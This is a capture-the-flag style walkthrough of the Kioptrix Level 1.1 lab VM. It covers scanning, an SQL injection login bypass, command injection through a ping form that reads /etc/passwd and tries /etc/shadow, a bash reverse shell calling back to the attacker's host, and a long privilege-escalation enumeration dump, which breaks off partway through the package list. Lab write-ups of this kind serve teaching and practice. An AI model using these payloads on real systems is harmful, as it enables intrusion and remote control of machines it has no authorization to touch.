Kioptrix Level 1.1 Walkthrough

Preparation:

Download the virtual machine  from the following website:

https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

The target server: Kioptirx Level 1.1(#2)

1. Discover the IP address of the target server. We find the target IP address is 10.0.0.28 in this case.

netdiscover -r 10.0.0.0/

2. Perform the TCP/UDP scan using the tool Nmap.

TCP scan 1:

nmap -Pn -sS --stats-every 3m --max-retries  --max-scan-delay  --defeat-rst-ratelimit -T4 -p1- -oN /root/kioptrix2/tcp1.txt 10.0.0.28

TCP Scan 2:

nmap -nvv -Pn- -sSV -p ,,,,,, --version-intensity  -A -oN /root/kioptrix2/tcp2.txt 10.0.0.28

3. Browse the target website through Firefox.

The source page shows the following code:

<html>
<body>
<form method="post" name="frmLogin" id="frmLogin" action="index.php">
<table width="300" border="1" align="center" cellpadding="2" cellspacing="2">
<tr>
<td colspan='2' align='center'>
<b>Remote System Administration Login</b>
</td>
</tr>
<tr>
<td width="150">Username</td>
<td><input name="uname" type="text"></td>
</tr>
<tr>
<td width="150">Password</td>
<td>
<input name="psw" type="password">
</td>
</tr>
<tr>
<td colspan="2" align="center">
<input type="submit" name="btnLogin" value="Login">
</td>
</tr>
</table>
</form> <!-- Start of HTML when logged in as Administator -->
</body>
</html>

Try to use the cheat sheet in the following website to test for SQL injection authentication bypass.

https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/

Ahaaaa! The cheat sheet 'admin' #' is effective.

The source page shows the following codes:

<html>
<body> <!-- Start of HTML when logged in as Administator -->
<form name="ping" action="pingit.php" method="post" target="_blank">
<table width='600' border='1'>
<tr valign='middle'>
<td colspan='2' align='center'>
<b>Welcome to the Basic Administrative Web Console<br></b>
</td>
</tr>
<tr valign='middle'>
<td align='center'>
Ping a Machine on the Network:
</td>
<td align='center'>
<input type="text" name="ip" size="30">
<input type="submit" value="submit" name="submit">
</td>
</td>
</tr>
</table>
</form> </body>
</html>

4. Try to find more interesting things through the pingit page.

Ping "127.0.0.1"

Ping "127.0.0.1;id", so we find the uid.

Ping "127.0.0.1;pwd"

Ping "127.0.0.1;cat /etc/shadow".  But No root authentication.

Ping "127.0.0.1;cat /etc/passwd".

5. Try to find a command execution vulnerability using the reverse shell cheat sheet in the pentest monkey website.

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Start the tool Ncat in the Kali Linux.

nc -nvlp 

Copy the bash command to the pingit page and modify it.

Ping "127.0.0.1;bash -i >& /dev/tcp/10.0.0.26/4444 0>&1"

Ahaaa. The communication is established.

Down load the linuxprivchecker.py file from the Kali Linux to the Kioptrix server.

wget http://10.0.0.26/linuxprivchecker.py

Run the linuxprivchecker.py on the Kioptrix server. Find the Kernel version first.

chmod  linuxprivchecker.py

python linuxprivchecker.py
=================================================================================================
LINUX PRIVILEGE ESCALATION CHECKER
================================================================================================= [*] GETTING BASIC SYSTEM INFO... [+] Kernel
Linux version 2.6.9-55.EL (mockbuild@builder6.centos.org) (gcc version 3.4.6 20060404 (Red Hat 3.4.6-8)) #1 Wed May 2 13:52:16 EDT 2007 [+] Hostname
kioptrix.level2 [+] Operating System
Welcome to Kioptrix Level 2 Penetration and Assessment Environment
--The object of this game:
|_Acquire "root" access to this machine.
There are many ways this can be done, try and find more then one way to
appreciate this exercise.
DISCLAIMER: Kioptrix is not resposible for any damage or instability
caused by running, installing or using this VM image.
Use at your own risk.
WARNING: This is a vulnerable system, DO NOT run this OS in a production
environment. Nor should you give this system access to the o(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
utside world
(the Internet - or Interwebs..)
Good luck and have fun! [*] GETTING NETWORKING INFO... [+] Interfaces
eth0 Link encap:Ethernet HWaddr 00:0C:29:BE:7B:78
inet addr:10.0.0.28 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:febe:7b78/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:281068 errors:8 dropped:37 overruns:0 frame:0
TX packets:221829 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:29487030 (28.1 MiB) TX bytes:39516124 (37.6 MiB)
Interrupt:177 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:258 errors:0 dropped:0 overruns:0 frame:0
TX packets:258 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:20134 (19.6 KiB) TX bytes:20134 (19.6 KiB)
sit0 Link encap:IPv6-in-IPv4
NOARP MTU:1480 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) [+] Netstat
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:623 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:631 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 125 10.0.0.28:38572 10.0.0.26:4444 ESTABLISHED 12253/bash
tcp 0 0 :::80 :::* LISTEN 12251/sh
tcp 0 0 :::22 :::* LISTEN -
tcp 0 0 :::443 :::* LISTEN 12251/sh
tcp 0 0 ::ffff:10.0.0.28:80 ::ffff:10.0.0.26:50256 ESTABLISHED 12251/sh
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp 0 0 0.0.0.0:617 0.0.0.0:* -
udp 0 0 0.0.0.0:620 0.0.0.0:* -
udp 0 0 0.0.0.0:111 0.0.0.0:* -
udp 0 0 0.0.0.0:631 0.0.0.0:* - [+] Route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
10.0.0.0 * 255.255.255.0 U 0 0 0 eth0
default 10.0.0.1 0.0.0.0 UG 0 0 0 eth0 [*] GETTING FILESYSTEM INFO... [+] Mount results
/dev/mapper/VolGroup00-LogVol00 on / type ext3 (rw)
none on /proc type proc (rw)
none on /sys type sysfs (rw)
none on /dev/pts type devpts (rw,gid=5,mode=620)
/dev/hda1 on /boot type ext3 (rw)
none on /dev/shm type tmpfs (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
sunrpc on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw) [+] fstab entries
# This file is edited by fstab-sync - see 'man fstab-sync' for details
/dev/VolGroup00/LogVol00 / ext3 defaults 1 1
LABEL=/boot /boot ext3 defaults 1 2
none /dev/pts devpts gid=5,mode=620 0 0
none /dev/shm tmpfs defaults 0 0
none /proc proc defaults 0 0
none /sys sysfs defaults 0 0
/dev/VolGroup00/LogVol01 swap swap defaults 0 0 [+] Scheduled cron jobs
-rw-r--r-- 1 root root 0 Oct 7 2009 /etc/cron.deny
-rw-r--r-- 1 root root 255 Feb 21 2005 /etc/crontab
/etc/cron.d:
total 24
drwxr-xr-x 2 root root 4096 Jul 12 2006 .
drwxr-xr-x 80 root root 12288 Aug 3 02:29 ..
/etc/cron.daily:
total 108
drwxr-xr-x 2 root root 4096 Oct 7 2009 .
drwxr-xr-x 80 root root 12288 Aug 3 02:29 ..
lrwxrwxrwx 1 root root 28 Oct 7 2009 00-logwatch -> ../log.d/scripts/logwatch.pl
-rwxr-xr-x 1 root root 418 Sep 14 2006 00-makewhatis.cron
-rwxr-xr-x 1 root root 135 Feb 21 2005 00webalizer
-rwxr-xr-x 1 root root 276 Feb 21 2005 0anacron
-rw-r--r-- 1 root root 797 Feb 21 2005 certwatch
-rwxr-xr-x 1 root root 180 Oct 20 2006 logrotate
-rwxr-xr-x 1 root root 2133 Dec 1 2004 prelink
-rwxr-xr-x 1 root root 104 May 4 2007 rpm
ls: //.*_history: No such file or directory
-rwxr-xr-x 1 root root 121 Aug 21 2005 slocate.cron
-rwxr-xr-x 1 root root 286 Feb 21 2005 tmpwatch
-rwxr-xr-x 1 root root 158 May 5 2007 yum.cron
/etc/cron.hourly:
total 24
drwxr-xr-x 2 root root 4096 Feb 21 2005 .
drwxr-xr-x 80 root root 12288 Aug 3 02:29 ..
/etc/cron.monthly:
total 32
drwxr-xr-x 2 root root 4096 Oct 7 2009 .
drwxr-xr-x 80 root root 12288 Aug 3 02:29 ..
-rwxr-xr-x 1 root root 278 Feb 21 2005 0anacron
/etc/cron.weekly:
total 48
drwxr-xr-x 2 root root 4096 Oct 7 2009 .
drwxr-xr-x 80 root root 12288 Aug 3 02:29 ..
-rwxr-xr-x 1 root root 414 Sep 14 2006 00-makewhatis.cron
-rwxr-xr-x 1 root root 277 Feb 21 2005 0anacron
-rwxr-xr-x 1 root root 90 May 5 2007 yum.cron [+] Writable cron dirs
lrwxrwxrwx 1 root root 28 Oct 7 2009 00-logwatch -> ../log.d/scripts/logwatch.pl [*] ENUMERATING USER AND ENVIRONMENTAL INFO... [+] Logged in User Activity
03:57:07 up 2:33, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT [+] Sudoers (privileged) [+] All users
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
john:x:500:500::/home/john:/bin/bash
harold:x:501:501::/home/harold:/bin/bash [+] Current User ID
uid=48(apache) gid=48(apache) groups=48(apache) [+] Super Users Found:
root [+] Environment
CONSOLE=/dev/console
SELINUX_INIT=YES
TERM=linux
INIT_VERSION=sysvinit-2.85
PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin
_=/bin/env
runlevel=3
RUNLEVEL=3
PWD=/tmp
LANG=en_US.UTF-8
previous=N
PREVLEVEL=N
SHLVL=5
HOME=/ [+] Current User
apache [+] Root and current user history (depends on privs) [*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS... [+] World Writeable Directories for User/Group 'Root' [+] World Writeable Directories for Users other than Root [+] World Writable Files [+] Checking if root's home folder is accessible [+] SUID/SGID Files and Directories
-rwxr-Sr-t 1 root root 1733 Feb 9 2012 /var/www/html/index.php
-rwxr-Sr-t 1 root root 199 Oct 8 2009 /var/www/html/pingit.php
-rwxr-sr-x 1 root root 11367 May 3 2007 /sbin/netreport
-r-sr-xr-x 1 root root 46076 May 2 2007 /sbin/unix_chkpwd
-r-s--x--x 1 root root 20016 May 2 2007 /sbin/pam_timestamp_check
-r-sr-xr-x 1 root root 301242 May 2 2007 /sbin/pwdb_chkpwd
-rwsr-xr-x 1 root root 6096 May 2 2007 /usr/sbin/ccreds_validate
-rwxr-sr-x 1 root lock 15372 Apr 4 2006 /usr/sbin/lockdev
-rws--x--x 1 root root 30760 May 2 2007 /usr/sbin/userhelper
-rwxr-sr-x 1 root smmsp 746328 May 2 2007 /usr/sbin/sendmail.sendmail
-rwsr-xr-x 1 root root 6668 Feb 21 2005 /usr/sbin/userisdnctl
-rwxr-sr-x 1 root utmp 10497 Feb 21 2005 /usr/sbin/utempter
-r-s--x--- 1 root apache 10760 May 4 2007 /usr/sbin/suexec
-rwsr-xr-x 1 root root 15228 May 3 2007 /usr/sbin/usernetctl
-rws--x--x 1 root root 434644 May 2 2007 /usr/libexec/openssh/ssh-keysign
-rwsr-xr-x 1 root root 7396 May 2 2007 /usr/libexec/pt_chown
-rwsr-xr-x 1 root root 123961 May 3 2007 /usr/kerberos/bin/ksu
-rwsr-x--- 1 root squid 9952 May 4 2007 /usr/lib/squid/pam_auth
-rwsr-x--- 1 root squid 10208 May 4 2007 /usr/lib/squid/ncsa_auth
-r-xr-sr-x 1 root tty 9752 May 5 2007 /usr/bin/wall
-rwxr-sr-x 1 root slocate 38548 Aug 21 2005 /usr/bin/slocate
-rws--x--x 1 root root 18392 May 3 2007 /usr/bin/chsh
-rwxr-sr-x 1 root mail 14636 Feb 21 2005 /usr/bin/lockfile
-rwsr-xr-x 1 root root 17304 May 10 2006 /usr/bin/rcp
---s--x--x 1 root root 93816 Aug 21 2005 /usr/bin/sudo
-rwxr-sr-x 1 root tty 10124 May 3 2007 /usr/bin/write
-rwsr-xr-x 1 root root 117802 May 2 2007 /usr/bin/chage
-rwsr-xr-x 1 root root 82772 Jul 12 2006 /usr/bin/crontab
-rwsr-xr-x 1 root root 12312 May 10 2006 /usr/bin/rlogin
-rwsr-xr-x 1 root root 8692 May 10 2006 /usr/bin/rsh
-rwsr-xr-x 1 root root 131181 May 2 2007 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 42280 Apr 26 2006 /usr/bin/at
-rws--x--x 1 root root 7700 May 3 2007 /usr/bin/newgrp
-rws--x--x 1 root root 17708 May 3 2007 /usr/bin/chfn
-rwxr-sr-x 1 root nobody 57932 May 2 2007 /usr/bin/ssh-agent
-rwsr-xr-x 1 root root 19597 May 3 2007 /usr/bin/lppasswd
-rwsr-xr-x 1 root root 72261 May 2 2007 /usr/bin/sg
-r-s--x--x 1 root root 21200 Aug 21 2005 /usr/bin/passwd
-rwsr-xr-x 1 root root 87016 May 3 2007 /bin/mount
-rwsr-xr-x 1 root root 12300 May 2 2007 /bin/traceroute6
-rwsr-xr-x 1 root root 23844 Nov 23 2006 /bin/traceroute
-rwsr-xr-x 1 root root 53612 May 3 2007 /bin/umount
-rwsr-xr-x 1 root root 30924 May 2 2007 /bin/ping6
-rwsr-xr-x 1 root root 33272 May 2 2007 /bin/ping
-rwsr-xr-x 1 root root 61168 May 5 2007 /bin/su [+] Logs containing keyword 'password' [+] Config files containing keyword 'password'
Binary file /etc/prelink.cache matches
/etc/lftp.conf:## This can be e.g. TIS-FWTK or rftpd. User and password are optional.
/etc/ltrace.conf:; pwd.h
/etc/pwdb.conf:# This is the configuration file for the pwdb library
/etc/log.d/logwatch.conf:#Service = pam_pwdb # PAM_pwdb messages - usually quite a bit
/etc/log.d/conf/logwatch.conf:#Service = pam_pwdb # PAM_pwdb messages - usually quite a bit
/etc/log.d/conf/services/pam_pwdb.conf:# $Id: pam_pwdb.conf,v 1.7 2002/10/12 02:08:09 kirk Exp $
/etc/log.d/conf/services/pam_pwdb.conf:Title = "PAM_pwdb"
/etc/log.d/conf/services/pam_pwdb.conf:# Only give lines pertaining to the PAM_pwdb service...
/etc/log.d/conf/services/pam_pwdb.conf:*OnlyService = pam_pwdb
/etc/squid/squid.conf.default:# login=user:password | PASS | *:password
/etc/squid/squid.conf.default:# use 'login=user:password' if this is a personal/workgroup
/etc/squid/squid.conf.default:# password to the peer. USE WITH CAUTION
/etc/squid/squid.conf.default:# use 'login=*:password' to pass the username to the
/etc/squid/squid.conf.default:# upstream cache, but with a fixed password. This is meant
/etc/squid/squid.conf.default:# the login=username:password option above.
/etc/squid/squid.conf.default:# If you want the anonymous login password to be more informative
/etc/squid/squid.conf.default:# reads a line containing "username password" and replies "OK" or
/etc/squid/squid.conf.default:# backlog of usercode/password verifications, slowing it down. When
/etc/squid/squid.conf.default:# password verifications are done via a (slow) network you are likely to
/etc/squid/squid.conf.default:# will see when prompted their username and password).
/etc/squid/squid.conf.default:# username:password pair is valid for - in other words how often the
/etc/squid/squid.conf.default:# revalidation with short lived passwords. Note that setting this high
/etc/squid/squid.conf.default:# using an one-time password system (such as SecureID). If you are using
/etc/squid/squid.conf.default:# when prompted their username and password).
/etc/squid/squid.conf.default:# # to check username/password combinations (see
/etc/squid/squid.conf.default:#acl password proxy_auth REQUIRED
/etc/squid/squid.conf.default:# user's default group ID (taken from the password file) and
/etc/squid/squid.conf.default:# Specify passwords for cachemgr operations.
/etc/squid/squid.conf.default:# Usage: cachemgr_passwd password action action ...
/etc/squid/squid.conf.default:# valid password, others can be performed if not listed here.
/etc/squid/squid.conf.default:# To disable an action, set the password to "disable".
/etc/squid/squid.conf.default:# To allow performing an action without a password, set the
/etc/squid/squid.conf.default:# password to "none".
/etc/squid/squid.conf.default:# Use the keyword "all" to set the same password for all actions.
/etc/pear.conf:a:23:{s:9:"cache_dir";s:19:"/var/cache/php-pear";s:15:"default_channel";s:12:"pear.php.net";s:16:"preferred_mirror";s:12:"pear.php.net";s:13:"remote_config";s:0:"";s:13:"auto_discover";i:0;s:13:"master_server";s:12:"pear.php.net";s:10:"http_proxy";s:0:"";s:7:"php_dir";s:15:"/usr/share/pear";s:7:"doc_dir";s:19:"/usr/share/pear/doc";s:7:"bin_dir";s:8:"/usr/bin";s:8:"data_dir";s:20:"/usr/share/pear/data";s:8:"test_dir";s:20:"/usr/share/pear/test";s:7:"php_bin";s:12:"/usr/bin/php";s:8:"username";s:0:"";s:8:"password";s:0:"";s:7:"verbose";i:1;s:15:"preferred_state";s:6:"stable";s:5:"umask";i:18;s:9:"cache_ttl";i:3600;s:8:"sig_type";s:3:"gpg";s:7:"sig_bin";s:12:"/usr/bin/gpg";s:9:"sig_keyid";s:0:"";s:10:"sig_keydir";s:13:"/etc/pearkeys";}
/etc/httpd/conf.d/ssl.conf:# Note that no password is obtained from the user. Every entry in the user
/etc/httpd/conf.d/ssl.conf:# file needs this password: `xxj31ZMTZzkVA'.
/etc/samba/smb.conf:# Use password server option only with security = server
/etc/samba/smb.conf:; password server = <NT-Server-Name>
/etc/samba/smb.conf:# Password Level allows matching of _n_ characters of the password for
/etc/samba/smb.conf:; password level = 8
/etc/samba/smb.conf:# You may wish to use password encryption. Please read
/etc/samba/smb.conf:; encrypt passwords = yes
/etc/samba/smb.conf:# The following are needed to allow password changing from Windows to
/etc/samba/smb.conf:# update the Linux system password also.
/etc/samba/smb.conf:# NOTE: Use these with 'encrypt passwords' and 'smb passwd file' above.
/etc/samba/smb.conf:# the encrypted SMB passwords. They allow the Unix password
/etc/samba/smb.conf:# to be kept in sync with the SMB password.
/etc/samba/smb.conf:; unix password sync = Yes
/etc/samba/smb.conf:; passwd chat = *New*UNIX*password* %n\n *ReType*new*UNIX*password* %n\n *passwd:*all*authentication*tokens*updated*successfully*
/etc/my.cnf:# Default to using old password format for compatibility with mysql 3.x
/etc/my.cnf:old_passwords=1
/etc/ldap.conf:# Search the root DSE for the password policy (works
/etc/ldap.conf:# If you are using XAD, you can set pam_password
/etc/ldap.conf:# Do not hash the password at all; presume
/etc/ldap.conf:#pam_password clear
/etc/ldap.conf:# Hash password locally; required for University of
/etc/ldap.conf:#pam_password crypt
/etc/ldap.conf:# Remove old password first, then update in
/etc/ldap.conf:#pam_password nds
/etc/ldap.conf:#pam_password racf
/etc/ldap.conf:# Update Active Directory password, by
/etc/ldap.conf:# creating Unicode password and updating
/etc/ldap.conf:#pam_password ad
/etc/ldap.conf:# Use the OpenLDAP password change
/etc/ldap.conf:# extended operation to update the password.
/etc/ldap.conf:#pam_password exop
/etc/ldap.conf:# Redirect users to a URL or somesuch on password
/etc/ldap.conf:#pam_password_prohibit_message Please visit http://internal to change your password.
/etc/ldap.conf:#pam_password ad
/etc/ldap.conf:#nss_map_attribute shadowLastChange pwdLastSet
/etc/ldap.conf:#pam_password ad
/etc/ldap.conf:#nss_map_attribute shadowLastChange pwdLastSet
/etc/ldap.conf:#pam_password ad
/etc/ldap.conf:# configure --enable-authpassword is no longer supported
/etc/ldap.conf:#nss_map_attribute userPassword passwordChar
/etc/ldap.conf:#pam_password clear
/etc/ldap.conf:# at present and does not support password policy control
/etc/ldap.conf:pam_password md5 [+] Shadow File (Privileged) [*] ENUMERATING PROCESSES AND APPLICATIONS... [+] Installed Packages
4Suite-1.0-3
acl-2.2.23-5.3.el4
acpid-1.0.3-2
alchemist-1.0.34-1
alsa-lib-1.0.6-5.RHEL4
alsa-utils-1.0.6-6
anacron-2.3-32
apmd-3.0.2-24
apr-0.9.4-24.5.c4.2
apr-util-0.9.4-21
arptables_jf-0.0.8-2
ash-0.3.8-20
aspell-0.50.5-4.EL4
aspell-en-0.51-11
at-3.1.8-80_EL4
atk-1.8.0-2
attr-2.4.16-3.1.el4
audiofile-0.2.6-1.el4.1
audit-1.0.15-3.EL4
audit-libs-1.0.15-3.EL4
authconfig-4.6.10-rhel4.3
authconfig-gtk-4.6.10-rhel4.3
autoconf-2.59-5
autofs-4.1.3-199.3
automake14-1.4p6-12
automake15-1.5-13
automake16-1.6.3-5
automake17-1.7.9-5
automake-1.9.2-3
basesystem-8.0-4
bash-3.0-19.3
bc-1.06-17.1
beecrypt-3.1.0-6
bind-libs-9.2.4-24.EL4
bind-utils-9.2.4-24.EL4
binutils-2.15.92.0.2-22
bison-1.875c-2
bluez-bluefw-1.0-6
bluez-hcidump-1.11-1
bluez-libs-2.10-2
bluez-pin-0.23-3
bluez-utils-2.10-2.1
boost-1.32.0-6.rhel4
boost-devel-1.32.0-6.rhel4
byacc-1.9-28
bzip2-1.0.2-13.EL4.3
bzip2-devel-1.0.2-13.EL4.3
bzip2-libs-1.0.2-13.EL4.3
cdecl-2.5-30
centos-release-4-4.3
checkpolicy-1.17.5-1
chkconfig-1.3.13.5.EL4-1
chkfontpath-1.10.0-2
ckermit-8.0.209-9
comps-4.5CENTOS-0.20070506
comps-extras-10.1-1
coreutils-5.2.1-31.6
cpio-2.5-13.RHEL4
cpp-3.4.6-8
cracklib-2.8.9-1.3
cracklib-dicts-2.8.9-1.3
crash-4.0-3.9
crontabs-1.10-7
crypto-utils-2.1-4
cryptsetup-0.1-4
cscope-15.5-9.RHEL4
ctags-5.5.4-1
cups-1.1.22-0.rc1.9.20
cups-libs-1.1.22-0.rc1.9.20
curl-7.12.1-11.el4
curl-devel-7.12.1-11.el4
cvs-1.11.17-9.RHEL4
cyrus-sasl-2.1.19-5.EL4
cyrus-sasl-devel-2.1.19-5.EL4
cyrus-sasl-md5-2.1.19-5.EL4
cyrus-sasl-plain-2.1.19-5.EL4
dapl-1.2.1-7
db4-4.2.52-7.1
db4-devel-4.2.52-7.1
db4-utils-4.2.52-7.1
dbus-0.22-12.EL.9
dbus-devel-0.22-12.EL.9
dbus-glib-0.22-12.EL.9
dbus-python-0.22-12.EL.9
desktop-file-utils-0.9-3.el4
device-mapper-1.02.17-3.el4
dhclient-3.0.1-59.EL4
dhcpv6_client-0.10-17_EL4
dialog-1.0.20040731-3
diffstat-1.31-5
diffutils-2.8.1-12
diskdumputils-1.3.25-1
distcache-1.4.5-6
dmraid-1.0.0.rc14-5_RHEL4_U5
dmraid-devel-1.0.0.rc14-5_RHEL4_U5
dos2unix-3.1-21.2
dosfstools-2.8-18
doxygen-1.3.9.1-1
dump-0.4b39-3.EL4.2
e2fsprogs-1.35-12.5.el4
e2fsprogs-devel-1.35-12.5.el4
ed-0.2-36
eject-2.0.13-11
elfutils-0.97.1-4
elfutils-libelf-0.97.1-4
emacs-21.3-19.EL.4
emacs-common-21.3-19.EL.4
emacs-leim-21.3-19.EL.4
emacspeak-17.0-7
esound-0.2.35-2
ethtool-1.8-4
expat-1.95.7-4
expat-devel-1.95.7-4
fbset-2.1-17
file-4.10-3.EL4.5
filesystem-2.3.0-1
findutils-4.1.20-7.el4.3
finger-0.17-26.EL4.1
flex-2.5.4a-33
fontconfig-2.2.3-7.centos4
fonts-xorg-75dpi-6.8.2-1.EL
freetype-2.1.9-5.el4
ftp-0.17-23.EL4
gamin-0.1.7-1.2.EL4
gawk-3.1.3-10.1
gcc-3.4.6-8
gcc-c++-3.4.6-8
gcc-g77-3.4.6-8
gcc-java-3.4.6-8
GConf2-2.8.1-1
gd-2.0.28-5.4E
gdb-6.3.0.0-1.143.el4
gdbm-1.8.0-24
gdbm-devel-1.8.0-24
gettext-0.14.1-13
glib-1.2.10-15
glib2-2.4.7-1
glib2-devel-2.4.7-1
glibc-2.3.4-2.36
glibc-common-2.3.4-2.36
glibc-devel-2.3.4-2.36
glibc-headers-2.3.4-2.36
glibc-kernheaders-2.4-9.1.100.EL
gmp-4.1.4-3
gmp-devel-4.1.4-3
gnome-keyring-0.4.0-1
gnome-mime-data-2.4.1-5
gnome-python2-2.6.0-3
gnome-python2-bonobo-2.6.0-3
gnome-python2-canvas-2.6.0-3
gnome-vfs2-2.8.2-8.2
gnupg-1.2.6-9
gnutls-1.0.20-3.2.3
gpg-pubkey-443e1821-421f218f
gpm-1.20.1-71.RHEL4
gpm-devel-1.20.1-71.RHEL4
grep-2.5.1-32.3
groff-1.18.1.1-3.EL4
grub-0.95-3.8
gtk2-2.4.13-22
guile-1.6.4-14
gzip-1.3.3-16.rhel4
hal-0.4.2-6.EL4
hdparm-5.7-2
hesiod-3.0.2-30
hesiod-devel-3.0.2-30
hotplug-2004_04_01-7.8
htmlview-3.0.0-8
httpd-2.0.52-32.ent.centos4
httpd-manual-2.0.52-32.ent.centos4
httpd-suexec-2.0.52-32.ent.centos4
hwdata-0.146.28.EL-1
ibutils-1.0-4
indent-2.2.9-6
indexhtml-4-2.centos4
info-4.7-5.el4.2
initscripts-7.93.29.EL-1.centos4
iproute-2.6.9-3.EL4.7
ipsec-tools-0.3.3-6.rhel4.1
iptables-1.2.11-3.1.RHEL4
iptstate-1.3-4
iputils-20020927-19.EL4.5
irda-utils-0.9.16-3
isdn4k-utils-3.2-18.p1.1
java-1.4.2-gcj-compat-1.4.2.0-27jpp
jpackage-utils-1.7.3-1jpp.1.el4
jwhois-3.2.2-6.EL4.1
kbd-1.12-2.el4.4
kernel-2.6.9-55.EL
kernel-devel-2.6.9-55.EL
kernel-hugemem-devel-2.6.9-55.EL
kernel-smp-devel-2.6.9-55.EL
kernel-utils-2.4-13.1.99
keyutils-1.0-2
keyutils-libs-1.0-2
krb5-devel-1.3.4-47
krb5-libs-1.3.4-47
krb5-workstation-1.3.4-47
krbafs-1.2.2-6
krbafs-devel-1.2.2-6
kudzu-1.1.95.22-1
kudzu-devel-1.1.95.22-1
less-382-4.rhel4
lftp-3.0.6-3
lha-1.14i-17
libacl-2.2.23-5.3.el4
libacl-devel-2.2.23-5.3.el4
libart_lgpl-2.3.16-3
libattr-2.4.16-3.1.el4
libattr-devel-2.4.16-3.1.el4
libbonobo-2.8.0-2
libbonoboui-2.8.0.99cvs20040929-2
libcap-1.10-20
libcap-devel-1.10-20
libdbi-0.6.5-10.RHEL4.1
libdbi-dbd-mysql-0.6.5-10.RHEL4.1
libf2c-3.4.6-8
libgcc-3.4.6-8
libgcj-3.4.6-8
libgcj-devel-3.4.6-8
libgcrypt-1.2.0-3
libglade2-2.4.0-5
libgnome-2.8.0-2
libgnomecanvas-2.8.0-1
libgnomeui-2.8.0-1
libgpg-error-1.0-1
libgssapi-0.8-1
libibcommon-1.0.1-7
libibumad-1.0.1-7
libibverbs-1.0.4-7
libIDL-0.8.4-1.centos4
libidn-0.5.6-1
libidn-devel-0.5.6-1
libjpeg-6b-33
libmng-1.0.8-1
libmthca-1.0.3.1-7
libogg-1.1.2-1
libogg-devel-1.1.2-1
libpcap-0.8.3-10.RHEL4
libpng-1.2.7-1.el4.2
librdmacm-0.9.1-7
libsdp-1.1.0-7
libselinux-1.19.1-7.3
libselinux-devel-1.19.1-7.3
libsepol-1.1.1-2
libstdc++-3.4.6-8
libstdc++-devel-3.4.6-8
libtermcap-2.0.8-39
libtermcap-devel-2.0.8-39
libtiff-3.6.1-12
libtool-1.5.6-4.EL4.1.c4.4
libtool-libs-1.5.6-4.EL4.1.c4.4
libungif-4.1.3-1.el4.2
libusb-0.1.8-3
libusb-devel-0.1.8-3
libuser-0.52.5-1.el4.1
libuser-devel-0.52.5-1.el4.1
libvorbis-1.1.0-1
libvorbis-devel-1.1.0-1
libwvstreams-3.75.0-2
libxml2-2.6.16-10
libxml2-devel-2.6.16-10
libxml2-python-2.6.16-10
libxslt-1.1.11-1
